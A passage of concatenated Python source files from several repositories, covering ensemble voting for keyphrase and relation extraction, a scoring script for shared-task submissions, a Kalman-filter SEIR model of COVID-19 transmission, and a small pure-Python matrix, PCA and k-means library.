X_training.append(self.relation_features(relation, doc=doc))
if X_training[-1] is None:
del X_training[-1]
continue
y_training.append(relation.label)
for k1 in sentence.keyphrases:
for k2 in sentence.keyphrases:
if k1 == k2:
continue
if (
not sentence.find_relations(k1, k2)
and random.uniform(0, 1) < self.negative_sampling
):
X_training.append(self.relation_features(None, k1, k2, doc))
if X_training[-1] is None:
del X_training[-1]
continue
y_training.append("")
if self.callback:
self.callback(
msg="Processing sentence",
current=i,
total=len(collection.sentences),
)
relation_classifier = make_pipeline(
DictVectorizer(), LogisticRegression(max_iter=1000)
)
relation_classifier.fit(X_training, y_training)
self.relation_classifier = relation_classifier
if __name__ == "__main__":
fire.Fire()
```
#### File: ensemble-baseline/scripts/stats.py
```python
from collections import defaultdict
from pathlib import Path
from scripts.agreement import load_corpus
from scripts.utils import Collection, CollectionV1Handler, CollectionV2Handler
def count_labels_on(corpus: Collection):
counter = defaultdict(int)
for sentence in corpus.sentences:
for kp in sentence.keyphrases:
counter[kp.label] += 1
for attr in kp.attributes:
counter[attr.label] += 1
for rel in sentence.relations:
counter[rel.label] += 1
return counter
def count_labels(path: Path, handler=None):
corpus = handler.load_dir(Collection(), path) if handler else load_corpus(path)
return count_labels_on(corpus)
def count_labels_based_on(path: Path, reference: Path):
collection = load_corpus(path)
reference = CollectionV1Handler.load_dir(Collection(), reference)
sentences = []
for ref_sent in reference.sentences:
for sent in collection.sentences:
if sent.text == ref_sent.text:
sentences.append(sent)
break
print(len(collection))
print(len(reference))
print(len(sentences))
return count_labels_on(Collection(sentences))
def count_complex_entities(path: Path):
count = 0
visited = set()
corpus = load_corpus(path)
for sentence in corpus.sentences:
for relation in sentence.relations:
if (
relation.from_phrase.id not in visited
and relation.label in ["subject", "target"]
and relation.to_phrase.label in ["Action", "Predicate"]
):
visited.add(relation.from_phrase.id)
count += 1
return count
def main():
# print(count_complex_entities(Path("./data/v1/medline/phase3-review")))
# print(count_labels(Path("./data/v1/medline/")))
# print(
# count_labels_based_on(
# Path("./data/v1/medline/phase3-review"),
# Path("./data/v1/ehealth19/testing/scenario3-taskB/"),
# )
# )
pass
if __name__ == "__main__":
main()
``` |
{
"source": "jpconsuegra/ensemble-kd2019",
"score": 2
} |
#### File: scripts/ensemble/ensemblers.py
```python
from collections import defaultdict
from typing import Dict, List, Optional
from scripts.ensemble import EnsembleChoir, EnsembledCollection, Ensembler
from scripts.utils import ENTITIES, RELATIONS, Collection
# =======================================================================
# - VotingEnsembler -----------------------------------------------------
# =======================================================================
class VotingEnsembler(Ensembler):
def _do_ensemble(self, to_ensemble: EnsembledCollection):
self._ensemble_annotations(to_ensemble.keyphrase_votes())
self._ensemble_annotations(to_ensemble.relation_votes())
def _ensemble_annotations(self, annotation_votes):
for sid, ann, votes_per_label in annotation_votes:
self._assign_label(ann, sid, votes_per_label)
def _assign_label(self, annotation, sid: int, votes_per_label: dict):
metrics = self._compute_metrics(annotation, sid, votes_per_label)
annotation.label = self._select_label(annotation, sid, metrics)
def _compute_metrics(self, annotation, sid: int, votes_per_label: dict) -> dict:
metrics = {}
for label, votes in votes_per_label.items():
metrics[label] = self._score_label(annotation, sid, label, votes)
return metrics
def _score_label(self, annotation, sid: int, label: str, votes: dict) -> float:
raise NotImplementedError()
def _select_label(self, annotation, sid: int, metrics: dict) -> str:
if not metrics:
return None
label = self._best_label(metrics)
return self._validate_label(annotation, sid, label, metrics[label])
def _best_label(self, metrics: dict) -> str:
return max(metrics, key=lambda x: metrics[x])
def _validate_label(
self, annotation, sid: int, label: str, score: float
) -> Optional[str]:
raise NotImplementedError()
class ManualVotingEnsembler(VotingEnsembler):
def __init__(self, choir, orchestrator, weighter, scorer, validator):
super().__init__(choir, orchestrator)
self._weighter = weighter
self._scorer = scorer
self._validator = validator
@property
def weight(self):
return self._weighter
@property
def score(self):
return self._scorer
@property
def validate(self):
return self._validator
def _score_label(self, annotation, sid: int, label: str, votes: dict) -> float:
weights = {submit: self.weight(label, sid, submit) for submit in votes}
return self.score(weights, annotation, sid, label)
def _validate_label(
self, annotation, sid: int, label: str, score: float
) -> Optional[str]:
return self.validate(annotation, sid, label, score)
# =======================================================================
# - Weighter ------------------------------------------------------------
# =======================================================================
class Weighter:
def __call__(self, label: str, sid: int, submit: str) -> float:
raise NotImplementedError()
class TableWeighter(Weighter):
def __init__(self, table={}):
self.table = table
def __call__(self, label: str, sid: int, submit: str) -> float:
return self.table[submit, label]
class UniformWeighter(TableWeighter):
@classmethod
def build(cls):
return cls(table=defaultdict(lambda: 1))
class F1Weighter(TableWeighter):
@classmethod
def build(cls, choir: EnsembleChoir, *, entities=ENTITIES, relations=RELATIONS):
table = defaultdict(int)
for label in ENTITIES + RELATIONS:
for name, submit in choir.submissions.items():
table[name, label] = cls._score(
choir,
submit,
label,
skipA=label not in entities, # I know :P
skipB=label not in relations,
)
return cls(table=table)
@classmethod
def _score(
cls,
choir: EnsembleChoir,
submit: Collection,
label: str,
skipA: bool,
skipB: bool,
):
submit_selection = submit.filter(
keyphrase=lambda k: (True if skipA else k.label == label),
relation=lambda r: r.label == label,
)
gold_selection = choir.gold.filter(
keyphrase=lambda k: (True if skipA else k.label == label),
relation=lambda r: r.label == label,
)
score = choir.evaluate_scenario(submit_selection, gold_selection, skipA, skipB)
return score["f1"]
# =======================================================================
# - Scorer --------------------------------------------------------------
# =======================================================================
class Scorer:
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
raise NotImplementedError()
class AverageScorer(Scorer):
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return sum(weights.values()) / len(weights)
class SumScorer(Scorer):
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return sum(weights.values())
class MaxScorer(Scorer):
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return max(weights.values())
class TopScorer(Scorer):
def __init__(self, k, merge):
self._k = k
self._merge = merge
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
top = sorted(weights.values(), reverse=True)[: self._k]
return self._merge(top) if top else 0.0
class AverageTopScorer(TopScorer):
def __init__(self, k: int, strict: bool):
merge = lambda top: sum(top) / (k if strict else len(top))
super().__init__(k, merge)
class AggregateTopScorer(TopScorer):
def __init__(self, k: int):
merge = lambda top: sum(top)
super().__init__(k, merge)
class ExpertScorer(Scorer):
def __init__(self, weighter, choir: EnsembleChoir, discrete: bool):
super().__init__()
self._weighter = weighter
self._choir = choir
self._discrete = discrete
@property
def weight(self):
return self._weighter
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
best = max(
self.weight(label, sid, submit) for submit in self._choir.submissions
)
return (
(1.0 if self._discrete else best)
if any(x for x in weights.values() if x >= best)
else 0.0
)
class GoldOracleScorer(Scorer):
def __init__(self, choir: EnsembleChoir):
super().__init__()
self._choir = choir
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return float(
self._everyone_voted(weights)
or self._found_in_gold_and_at_least_one_voted(annotation, sid, label)
)
def _everyone_voted(self, weights):
return len(weights) == len(self._choir.submissions)
def _found_in_gold_and_at_least_one_voted(self, annotation, sid: int, label: str):
gold_sentence = self._choir.gold.sentences[sid]
gold_annotation = gold_sentence.find_first_match(annotation, label)
return gold_annotation is not None
class FocusedScorer(Scorer):
def __init__(self, name: str, discrete: bool):
self._name = name
self._discrete = discrete
def __call__(self, weights: Dict[str, float], annotation, sid, label):
try:
weight = weights[self._name]
return 1.0 if self._discrete else weight
except KeyError:
return 0.0
class YesToAllScorer(Scorer):
def __call__(self, weights: Dict[str, float], annotation, sid, label):
return 1.0
# =======================================================================
# - Validator -----------------------------------------------------------
# =======================================================================
class Validator:
def __call__(self, annotation, sid: int, label: str, score: float) -> Optional[str]:
raise NotImplementedError()
class NonZeroValidator(Validator):
def __call__(self, annotation, sid: int, label: str, score: float) -> Optional[str]:
return label if score else None
class ThresholdValidator(Validator):
def __init__(self, thresholds: Dict[str, float]):
super().__init__()
self._thresholds = thresholds
def __call__(self, annotation, sid: int, label: str, score: float) -> Optional[str]:
return label if score > self._thresholds[label] else None
class ConstantThresholdValidator(ThresholdValidator):
def __init__(self, threshold=0.5):
super().__init__(thresholds=defaultdict(lambda: threshold))
class MajorityValidator(ConstantThresholdValidator):
def __init__(self, n_submits):
super().__init__(threshold=n_submits // 2)
```
#### File: scripts/ensemble/features.py
```python
from collections import defaultdict
from typing import Any, Dict, List, Literal, Tuple
import numpy as np
from scripts.utils import ENTITIES, RELATIONS
class FeatureBuilder:
def __call__(self, raw_features):
raise NotImplementedError()
class VotingFeatures(FeatureBuilder):
def __init__(self, voters, weighter=None):
self._voters = voters
self._weighter = weighter or (lambda x, y: 1)
def __call__(self, votes_for_label):
votes, label = votes_for_label
n_votes = len(self._voters)
features = np.zeros(n_votes)
select_votes = zip(
*[
(i, self._weighter(submit, label))
for i, submit in enumerate(self._voters)
if submit in votes
]
)
try:
voted, weights = select_votes
except ValueError:
voted, weights = [], []
voted = list(voted)
weights = list(weights)
features[voted] = weights
return features
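# Small example of the vector built above (voters and votes are illustrative):
# with VotingFeatures(voters=["a", "b", "c"]) and votes == {"a", "c"} for some
# label, the result is array([1., 0., 1.]) -- one slot per voter, default weight 1.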
class LabelFeatures(FeatureBuilder):
def __init__(self, labels):
self._label2index = {label: i for i, label in enumerate(labels)}
def __call__(self, label):
features = np.zeros(len(self._label2index))
index = self._label2index[label]
features[index] = 1
return features
class WithHandler(FeatureBuilder):
def __init__(self, builder: FeatureBuilder, handler):
self._builder = builder
self._handler = handler
def __call__(self, raw_features):
return self._builder(self._handler(raw_features))
class ConcatenatedFeatures(FeatureBuilder):
def __init__(self, *builders_and_handlers):
self._builders = [
WithHandler(builder=b, handler=h) for b, h in builders_and_handlers
]
def __call__(self, raw_features):
return np.concatenate([builder(raw_features) for builder in self._builders])
class ModelHandler:
def __call__(
self, annotation_votes, selected_sids=None
) -> Dict[str, Tuple[Any, List[int], List[Any], List[str], np.ndarray]]:
pass
class PerCategoryModel(ModelHandler):
def __init__(
self,
*,
voters,
labels_per_category: Dict[str, list],
model_init,
weighter=None,
):
self._builders = {
category: self._get_builder_according_to_labels(labels, voters, weighter)
for category, labels in labels_per_category.items()
}
self._models = {category: model_init() for category in labels_per_category}
self._label2category = {
label: category
for category, labels in labels_per_category.items()
for label in labels
}
assert sum(len(x) for x in labels_per_category.values()) == len(
self._label2category
)
@classmethod
def _get_builder_according_to_labels(cls, labels, voters, weighter):
if len(labels) > 1:
return ConcatenatedFeatures(
(LabelFeatures(labels), cls._get_label),
(VotingFeatures(voters, weighter), cls._get_votes),
)
else:
return WithHandler(VotingFeatures(voters, weighter), cls._get_votes)
@classmethod
def _get_label(cls, item):
label, _ = item
return label
@classmethod
def _get_votes(cls, item):
label, votes = item
return votes, label
def __call__(self, annotation_votes, selected_sids=None):
per_category = defaultdict(lambda: ([], [], [], []))
for sid, ann, votes_per_label in annotation_votes:
if selected_sids is None or sid in selected_sids:
                # TODO: in the non-binary case this does not do what is expected
for label, votes in votes_per_label.items():
if label not in self._label2category:
print(f"Ignoring {ann} with label {label}.")
continue
category = self._label2category[label]
builder = self._builders[category]
sids, anns, labels, features = per_category[category]
features.append(builder((label, votes)))
sids.append(sid)
anns.append(ann)
labels.append(label)
return {
category: (self._models[category], sids, anns, labels, np.asarray(features))
for category, (sids, anns, labels, features) in per_category.items()
}
class AllInOneModel(PerCategoryModel):
def __init__(self, *, voters, labels, model_init, weighter=None):
super().__init__(
voters=voters,
labels_per_category={"all": labels},
model_init=model_init,
weighter=weighter,
)
class PerLabelModel(PerCategoryModel):
def __init__(self, *, voters, labels, model_init, weighter=None):
super().__init__(
voters=voters,
labels_per_category={l: [l] for l in labels},
model_init=model_init,
weighter=weighter,
)
def model_handler_assistant(
*,
voters,
model_init,
labels=ENTITIES + RELATIONS,
mode: Literal["category", "all", "each"],
weighting_table: Dict[Tuple[str, str], float] = None,
):
weighter = (
(lambda submit, label: weighting_table[submit, label])
if weighting_table is not None
else None
)
if mode == "category":
labels_per_category = defaultdict(list)
for label in labels:
if label in ENTITIES:
labels_per_category["ENTITIES"].append(label)
elif label in RELATIONS:
labels_per_category["RELATIONS"].append(label)
else:
raise Exception("Unknown category!")
return lambda: PerCategoryModel(
voters=voters,
labels_per_category=labels_per_category,
model_init=model_init,
weighter=weighter,
)
elif mode == "all":
return lambda: AllInOneModel(
voters=voters, labels=labels, model_init=model_init, weighter=weighter
)
elif mode == "each":
return lambda: PerLabelModel(
voters=voters, labels=labels, model_init=model_init, weighter=weighter
)
else:
        raise ValueError(f"Unknown mode: {mode}")
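# A minimal usage sketch for model_handler_assistant (the voter ids and the
# sklearn model are illustrative; only the call pattern is taken from the
# signature above):
#
#   from sklearn.linear_model import LogisticRegression
#   make_handler = model_handler_assistant(
#       voters=["team-a", "team-b"],
#       model_init=lambda: LogisticRegression(),
#       mode="each",
#   )
#   handler = make_handler()                 # a PerLabelModel in "each" mode
#   per_label = handler(annotation_votes)    # {label: (model, sids, anns, labels, features)}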
```
#### File: ensemble-kd2019/scripts/evaltest.py
```python
import collections
import argparse
import pprint
import json
from pathlib import Path
from .score import subtaskA, subtaskB, compute_metrics
from .utils import Collection
def evaluate_scenario(submit, gold, scenario):
submit_input = submit / ("output_scenario%i.txt" % scenario)
if not submit_input.exists():
submit_input = submit / ("input_scenario%i.txt" % scenario)
if not submit_input.exists():
raise ValueError("Input file not found in '%s'" % submit)
submit = Collection().load(submit_input)
resultA = subtaskA(gold, submit)
resultB = subtaskB(gold, submit, resultA)
results = {}
for k,v in list(resultA.items()) + list(resultB.items()):
results[k] = len(v)
metrics = compute_metrics(dict(resultA, **resultB), skipA=scenario==3, skipB=scenario==2)
results.update(metrics)
return results
def evaluate_one(submit: Path, scenario1_gold, scenario2_gold, scenario3_gold):
scenario1_submit = submit / "scenario1-main"
scenario2_submit = submit / "scenario2-taskA"
scenario3_submit = submit / "scenario3-taskB"
scenario1 = dict(evaluate_scenario(scenario1_submit, scenario1_gold, 1), submit=submit.name)
scenario2 = dict(evaluate_scenario(scenario2_submit, scenario2_gold, 2), submit=submit.name)
scenario3 = dict(evaluate_scenario(scenario3_submit, scenario3_gold, 3), submit=submit.name)
return dict(submit=submit.name,
scenario1=scenario1,
scenario2=scenario2,
scenario3=scenario3)
def main(submits:Path, gold:Path, best=False, single=False, csv=False, pretty=False, final=False):
users = collections.defaultdict(list)
if csv and not best:
raise ValueError("Error: --csv implies --best")
if final and (not csv or not best):
raise ValueError("Error: --final implies --csv and --best")
scenario1_gold = Collection().load(gold / "scenario1-main" / "input_scenario1.txt")
scenario2_gold = Collection().load(gold / "scenario2-taskA" / "input_scenario2.txt")
scenario3_gold = Collection().load(gold / "scenario3-taskB" / "input_scenario3.txt")
if single:
for subfolder in submits.iterdir():
users[submits.name].append(evaluate_one(subfolder, scenario1_gold, scenario2_gold, scenario3_gold))
else:
for userfolder in submits.iterdir():
for subfolder in userfolder.iterdir():
users[userfolder.name].append(evaluate_one(subfolder, scenario1_gold, scenario2_gold, scenario3_gold))
results = dict(users)
if best:
results = filter_best(results)
if csv:
import pandas as pd
items = []
for user, data in results.items():
userdata = dict(name=user)
for k, metrics in data.items():
userdata.update({"%s-%s"%(k,m):v for m,v in metrics.items()})
items.append(userdata)
df = pd.DataFrame(items)
df = df.set_index('name').sort_index().transpose()
if final:
df1 = df.transpose()[['scenario1-f1', 'scenario1-precision', 'scenario1-recall']]
df1 = df1.sort_values('scenario1-f1', ascending=False).to_csv()
df2 = df.transpose()[['scenario2-f1', 'scenario2-precision', 'scenario2-recall']]
df2 = df2.sort_values('scenario2-f1', ascending=False).to_csv()
df3 = df.transpose()[['scenario3-f1', 'scenario3-precision', 'scenario3-recall']]
df3 = df3.sort_values('scenario3-f1', ascending=False).to_csv()
print(df1)
print(df2)
print(df3)
elif pretty:
print(df.to_html())
else:
print(df.to_csv())
else:
print(json.dumps(results, sort_keys=True, indent=2 if pretty else None))
def filter_best(results):
best = {}
for user, submits in results.items():
scenario1 = [entry['scenario1'] for entry in submits]
scenario2 = [entry['scenario2'] for entry in submits]
scenario3 = [entry['scenario3'] for entry in submits]
best1 = max(scenario1, key=lambda d:d['f1'])
best2 = max(scenario2, key=lambda d:d['f1'])
best3 = max(scenario3, key=lambda d:d['f1'])
best[user] = dict(scenario1=best1, scenario2=best2, scenario3=best3)
return best
if __name__ == "__main__":
parser = argparse.ArgumentParser("evaltest")
parser.add_argument("submits", help="Path to the submissions folder. This is the folder of all participants, or, if --single is passed, directly the folder of one participant. Each participant's folder contains subfolders with submissions.")
    parser.add_argument("gold", help="Path to the gold folder, e.g. './data/testing'.")
parser.add_argument("--best", action='store_true', help="Report only the best submission per scenario, otherwise all submissions are reported.")
parser.add_argument("--single", action='store_true', help="If passed, then submits points to a single participant folder with submission folders inside, otherwise submits points to a folder with many participants, each with submission folders inside.")
parser.add_argument("--csv", action='store_true', help="If passed then results are formatted as a table, can only be used with --best. Otherwise, results are returned in JSON format.")
parser.add_argument("--pretty", action='store_true', help="If passed results are pretty printed: indented in JSON or in HTML when using --csv.")
parser.add_argument("--final", action='store_true', help="If passed, results are formatted for final publication. Can only be passed with --csv and --best.")
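    # Example invocation (paths are illustrative; run module-style so the
    # relative imports above resolve):
    #   python -m scripts.evaltest ./submissions ./data/testing --best --csv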
args = parser.parse_args()
main(Path(args.submits), Path(args.gold), args.best, args.single, args.csv, args.pretty, args.final)
``` |
{
"source": "jpcorb20/covid19-transmission-ukf",
"score": 3
} |
#### File: jpcorb20/covid19-transmission-ukf/calculatate_transmission.py
```python
import numpy as np
import pandas as pd
from filterpy.kalman import UnscentedKalmanFilter, MerweScaledSigmaPoints
from filterpy.common import Q_discrete_white_noise
import matplotlib.pyplot as plt
def smooth(y, box_pts):
"""
Smoothing function.
:param y: np.array.
:param box_pts: window (int).
:return: smoother np.array.
"""
box = np.ones(box_pts)/box_pts
y_smooth = np.convolve(y, box, mode='same')
return y_smooth
def preprocess_data(data_country):
"""
Compute I and R from cumulative Cases, Recovered and Deaths data.
    :param data_country: fetched data like the Johns Hopkins Covid-19 data (pd.DataFrame).
    :return: list of daily (I, R) tuples.
"""
global DATA_SMOOTHING_WINDOW, CASES_CONSIDERED
return [(c - (r + d), r + d) for c, d, r
in zip(data_country['Cases'].rolling(DATA_SMOOTHING_WINDOW).mean(),
data_country['Dead'].rolling(DATA_SMOOTHING_WINDOW).mean(),
data_country['Recovered'].rolling(DATA_SMOOTHING_WINDOW).mean())
if c > CASES_CONSIDERED]
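# Small worked example of the (I, R) construction above (numbers are made up):
# with cumulative Cases=100, Recovered=20 and Dead=5 on a given day, the tuple is
# (100 - (20 + 5), 20 + 5) = (75, 25), i.e. 75 currently infected and 25 removed.
# The rolling mean only smooths the cumulative series before this is computed.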
def fx(x, delta_t):
"""
Equations from the SEIR model.
dS = - (R0 / T_inf) * (S / N) * I * dt
dE = ((R0 / T_inf) * (S / N) * I - E / T_inc) * dt
dI = (E / T_inc - beta * I) * dt
dR = beta * I * dt
dR0[t] = ddR0[t-1] * dt
ddR0[t] ~ N(0, q ** 2)
:param x: t-1 state vector.
:param delta_t: time delta.
:return: state vector at t.
"""
global t_inc, t_inf, N
S = x[0]
E = x[2] if x[2] >= 0 else 0
I = x[4]
R0 = x[8] if x[8] >= 0 else 0
dS_temp = (R0 / t_inf) * (S / N) * I * delta_t
dE_temp = (E / t_inc) * delta_t
dS = - dS_temp
dE = dS_temp - dE_temp
dR = (I / t_inf) * delta_t
dI = dE_temp - dR
dR0 = x[9] * delta_t
ddR0 = x[10] * delta_t
x[1] = dS
x[3] = dE
x[5] = dI
x[7] = dR
x[9] = ddR0
return x + np.array([dS, 0, dE, 0, dI, 0, dR if dR > 0 else 0, 0, dR0, ddR0, 0, 0], dtype=float)
def hx(x):
"""
Measurement from state vector.
:param x: state vector.
:return: measured vector.
"""
return np.array([x[4], x[6]])
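# Rough map of the 12-dimensional state vector, read off fx/hx above (the
# interpretation of the helper slots is an assumption; x[11] appears unused):
#   x[0]=S, x[2]=E, x[4]=I, x[6]=R, x[8]=R0,
#   the odd slots hold the most recent increments (dS, dE, dI, dR),
#   and x[9]/x[10] drive the random-walk drift of R0.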
# My data is using french country names.
POPULATIONS = {
"Canada": 37.7e6,
# "Québec": 8.4e6,
# "Portugal": 10.2e6,
# "France": 65.2e6,
"Italie": 60.5e6,
# "Espagne": 46.8e6,
# "Allemagne": 88e6,
# "États-Unis": 330e6
}
CASES_CONSIDERED = 30
DATA_SMOOTHING_WINDOW = 1
FORECAST_DAYS = 5
AVERAGE_R0_WINDOW = 7
SIGMA_CONSIDERED = 3
# From literature:
# - https://wwwnc.cdc.gov/eid/article/26/7/20-0282_article.
# - https://www.ncbi.nlm.nih.gov/pubmed/32097725.
# - https://gabgoh.github.io/COVID/index.html.
t_inf = 2.9
t_inc = 5.2
R0_init = 5.7 # Not very sensitive to the current or previous estimate of R0.
# Unscented Kalman Filter (UKF) setup.
dt = 1
dim_x, dim_z = 12, 2
z_std = (1e-2, 5e-3)
var_q = 5e-2
points = MerweScaledSigmaPoints(dim_x, alpha=1e-3, beta=2, kappa=1)
if __name__ == '__main__':
data = pd.read_excel("data.xlsx", index_col=0)
# Run UKF by populations.
results = list()
predicts = list()
for k, v in POPULATIONS.items():
print(k)
N = v
data_country = data[data["country"] == k]
zs = preprocess_data(data_country)
# SETUP UKF.
kf = UnscentedKalmanFilter(dim_x=dim_x, dim_z=dim_z, dt=dt, fx=fx, hx=hx, points=points)
        # ~ Initial conditions.
kf.x = np.array([v, 0,
0, 0,
zs[0][0], 0,
zs[0][1], 0,
R0_init, 0, 0, 0])
# Noise setup
kf.P *= 1e0 # factor on uncertainty of initial condition.
kf.R = np.diag([z ** 2 for z in list(z_std)])
kf.Q = Q_discrete_white_noise(dim=dim_z, dt=dt, var=var_q ** 2, block_size=int(dim_x / 2))
# RUN UKF
# Derive all hidden variables from past and present.
R = list()
R0 = list()
for z in zs:
kf.predict()
kf.update(z)
x, y = kf.x, kf.P
R0.append(x[8])
R.append((x, y))
# Predict future.
for i in range(FORECAST_DAYS):
# Keep R0 constant for predictions.
kf.x[8] = np.mean(R0[-AVERAGE_R0_WINDOW:])
kf.x[9] = 0
kf.x[10] = 0
try:
kf.predict()
x, y = kf.x, kf.P
R.append((x, y))
except np.linalg.LinAlgError:
print("Cannot predict %d" % i)
results.append(R)
# Plot population curves I, E and R.
for r, t in zip(results, POPULATIONS.keys()):
xs = range(len(r))
I = smooth([a[0][4] for a in r], DATA_SMOOTHING_WINDOW)
sI = [SIGMA_CONSIDERED * np.sqrt(a[1][4, 4]) for a in r]
R = smooth([a[0][6] for a in r], DATA_SMOOTHING_WINDOW)
sR = [SIGMA_CONSIDERED * np.sqrt(a[1][6, 6]) for a in r]
# E = smooth([a[0][2] for a in r], DATA_SMOOTHING_WINDOW)
# sE = [SIGMA_CONSIDERED * np.sqrt(a[1][2, 2]) for a in r]
plt.errorbar(x=xs, y=I, yerr=sI)
plt.errorbar(x=xs, y=R, yerr=sR)
# plt.errorbar(x=xs, y=E, yerr=sE)
plt.title(t)
plt.xlabel("Days from 30 first cases")
plt.ylabel("Persons")
plt.legend(["Infected", "Recovered", "Exposed"])
plt.grid(True)
plt.show()
# Plot R0.
for r, t in zip(results, POPULATIONS.keys()):
xs = range(len(r))
R0 = smooth([a[0][8] for a in r], DATA_SMOOTHING_WINDOW)
sR0 = [SIGMA_CONSIDERED * np.sqrt(a[1][8, 8]) for a in r]
plt.errorbar(x=xs, y=R0, yerr=sR0)
plt.legend(POPULATIONS.keys())
plt.xlabel("Days from 30 first cases")
plt.ylabel("R naught")
plt.grid(True)
plt.show()
``` |
{
"source": "jpcorb20/pure-matrix",
"score": 4
} |
#### File: jpcorb20/pure-matrix/matrix.py
```python
from random import random
from math import sqrt
from typing import List
class Matrix:
def __init__(self, lists: List[List[float]]):
lengths = list(map(lambda x: len(x), lists))
        assert all([i == lengths[0] for i in lengths]), "All rows must have the same length."
self._lists = lists
self.shape = (len(lists), lengths[0])
def __str__(self):
return str(self.get_list())
def __iter__(self):
return iter(self._lists)
def get_shape(self):
return self.shape
def get_list(self):
return self._lists
def get_element(self, i: int, j: int):
        assert i < self.shape[0] and j < self.shape[1], "Coordinates do not exist."
return self._lists[i][j]
def slice(self, i: tuple=None, j: tuple=None):
if i is None:
i = (0, self.shape[0])
if j is None:
j = (0, self.shape[1])
assert len(i) == 2 and len(j) == 2 and min(i) >= 0 and min(j) >= 0 and \
            max(i) <= self.shape[0] and max(j) <= self.shape[1], "Coordinates do not exist."
return Matrix([[self._lists[I][J] for J in list(range(*j))] for I in list(range(*i))])
def get_flatten_list(self):
return [j for i in self._lists for j in i]
def transpose(self):
return Matrix([[self._lists[i][j] for i in range(self.shape[0])] for j in range(self.shape[1])])
def sum(self, axis: int=-1):
assert axis in [-1, 0, 1], "Not a valid axis."
if axis == 0:
return Matrix([[sum(i)] for i in self._lists])
elif axis == 1:
return Matrix([[sum(i) for i in self.transpose()]])
elif axis == -1:
return sum([sum(i) for i in self._lists])
def mean(self, axis: int=-1):
assert axis in [-1, 0, 1], "Not a valid axis."
if axis == 0 or axis == 1:
return self.sum(axis=axis).scalar_product(1/float(self.shape[1-axis]))
elif axis == -1:
return self.sum(axis=-1) / (self.shape[0] * self.shape[1])
def scalar_product(self, a: float):
return Matrix([[a * j for j in i] for i in self._lists])
def element_sum(self, a):
assert self.shape == a.shape
return Matrix([
[j + q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def element_substract(self, a):
assert self.shape == a.shape
return Matrix([
[j - q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def element_product(self, a):
assert self.shape == a.shape
return Matrix([
[j * q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def element_exponent(self, power: int=2):
return Matrix([[j ** power for j in i] for i in self._lists])
def element_divide(self, a):
assert self.shape == a.shape
assert all([j != 0 for i in a.get_list() for j in i]), "At least one element is zero."
return Matrix([
[j / q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def column(self, j):
        assert j < self.shape[1], "Not enough columns"
return Matrix([[self._lists[i][j]] for i in range(self.shape[0])])
def row(self, i):
        assert i < self.shape[0], "Not enough rows"
return Matrix([[self._lists[i][j] for j in range(self.shape[1])]])
def mat_product(self, a):
assert self.shape[1] == a.get_shape()[0]
return Matrix([
[self.row(i).element_product(a.column(j).transpose()).sum()
for j in range(a.get_shape()[1])
] for i in range(self.shape[0])
])
def is_square(self):
return self.shape[0] == self.shape[1]
def repeat_vector(self, n: int):
s = self.get_shape()
        assert s[0] == 1 or s[1] == 1, "One dimension must be 1 for a vector."
if s[0] == 1:
return Matrix([self.get_list()[0] for _ in range(n)])
elif s[1] == 1:
return Matrix([[i[0] for _ in range(n)] for i in self.get_list()])
def standardize(self, axis: int=1):
assert axis in [0, 1], "Not a valid axis."
return self.element_substract(self.mean(axis=axis).repeat_vector(n=self.shape[1 - axis]))
def corr(self):
centered = self.standardize()
return centered.transpose().mat_product(centered)
class PCA:
def __init__(self, n_components: int=2):
self.n_components = n_components
self.val, self.vecs = None, None
def naive_power_iteration(self, A: Matrix, verbose: bool = False, tol: float = 1e-6, n_iter: int = 100):
assert A.is_square(), "A is not square"
n = A.get_shape()[0]
b_v = list()
b_vec = list()
for _ in range(n):
b_v_temp = None
b_v_new = 0
b = Matrix([[sqrt(1 / n)] for _ in range(n)])
for i in range(n_iter):
new_b = A.mat_product(b)
b = new_b.element_divide(Matrix([[sqrt(new_b.element_exponent(2).sum())] for _ in range(n)]))
b_v_new = b.transpose().mat_product(A.mat_product(b)).get_element(0, 0)
if len(b_v) > 0 and b_v_temp is not None and abs(b_v_new - b_v_temp) < tol:
if verbose:
print("break at step %d" % i)
break
b_v_temp = b_v_new
b_v.append(b_v_new)
b_vec.append(b.transpose().get_list()[0])
A = A.element_substract(b.mat_product(b.transpose()).scalar_product(b_v_temp))
self.val, self.vecs = b_v, Matrix(b_vec)
def fit(self, mat: Matrix):
self.naive_power_iteration(mat.corr(), verbose=True)
def transform(self, mat: Matrix):
assert self.val is not None and self.vecs is not None, "Not fitted"
return mat.standardize().mat_product(self.vecs.slice(i=(0, self.n_components)).transpose())
def fit_transform(self, mat: Matrix):
self.fit(mat)
return self.transform(mat)
def argmin(iterable):
return min(enumerate(iterable), key=lambda x: x[1])
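# e.g. argmin([3, 1, 2]) == (1, 1): the (index, value) pair of the smallest element.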
class KMean:
def __init__(self, n_clusters: int):
self.n_clusters = n_clusters
self.centroids = None
self.labels = None
def init_centroids(self, n: int):
self.centroids = Matrix([
[random() for _ in range(n)] for _ in range(self.n_clusters)
])
def get_labels(self, mat: Matrix):
n = mat.get_shape()[0]
results = list()
for i in range(self.n_clusters):
temp = mat.element_substract(self.centroids.row(i).repeat_vector(n=n))
temp = temp.element_exponent().sum(axis=0).transpose()
results.append(temp.get_list()[0])
return [argmin(r)[0] for r in Matrix(results).transpose().get_list()]
def new_centroid(self, data, n):
if len(data) > 0:
return Matrix(data).mean(axis=1).get_list()[0]
else:
return [random() for _ in range(n)]
def compute_new_centroids(self, n):
self.centroids = Matrix([
self.new_centroid([c for c, label in zip(self.centroids, self.labels) if label == i], n=n) for i in range(self.n_clusters)
])
def fit(self, mat: Matrix, n_iter: int=200, tol: float=1e-9, min_iter: int=30, verbose: bool=False):
s = mat.get_shape()
self.init_centroids(s[1])
old_centroids = None
for i in range(n_iter):
self.labels = self.get_labels(mat)
self.compute_new_centroids(s[1])
if old_centroids is not None and i > min_iter and \
old_centroids.element_substract(self.centroids).element_exponent().sum() < tol:
if verbose:
print("break at step %d" % i)
break
old_centroids = self.centroids
